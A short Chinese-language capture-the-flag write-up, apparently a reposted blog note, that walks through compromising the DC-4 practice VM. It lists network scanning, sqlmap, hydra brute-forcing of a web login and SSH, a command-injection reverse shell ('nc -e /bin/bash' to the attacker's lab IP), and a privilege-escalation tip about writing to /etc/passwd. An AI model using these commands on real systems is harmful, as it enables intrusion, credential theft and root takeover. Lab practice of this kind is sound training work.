靶机DC-4的通关笔记

首先寻找靶机ip

netdiscover -r 192.168.1.0/24

 

nmap -sS -p- -n -Pn 192.168.1.136

 

nmap -A -p22,80 -T3 -n -Pn 192.168.1.136

sqlmap -r xxx.txt random-agent --dbs --level 3 --risk 3

hydra -l admin -P password.lst -f 192.168.1.136 http-post-form "/login.php:username=^USER^&password=^PASS^:S=index.php" -V

radio=nc -e /bin/bash 192.168.1.131 3333&submit=Run

hydra -l jim -P pass.bak ssh://192.168.1.136 -vV

openssl passwd -1 -salt test 123456

最后总结:

  1.遇到登录界面,一般有两种思路:sql注入、爆破

  2.hydra遇到表单爆破时,返回包是302跳转并没有错误提示也不知道正确提示,就很难找到错误标志,

  3./var/mail 一般是放mail 的地方也要搜一搜。

  4.优化bash python -c 'import pty;pty.spawn("/bin/bash");'

  5.向/etc/passwd写内容提权是最好设个密码。

  6.我真菜

猜你喜欢

转载自www.cnblogs.com/yeblade/p/12743852.html
今日推荐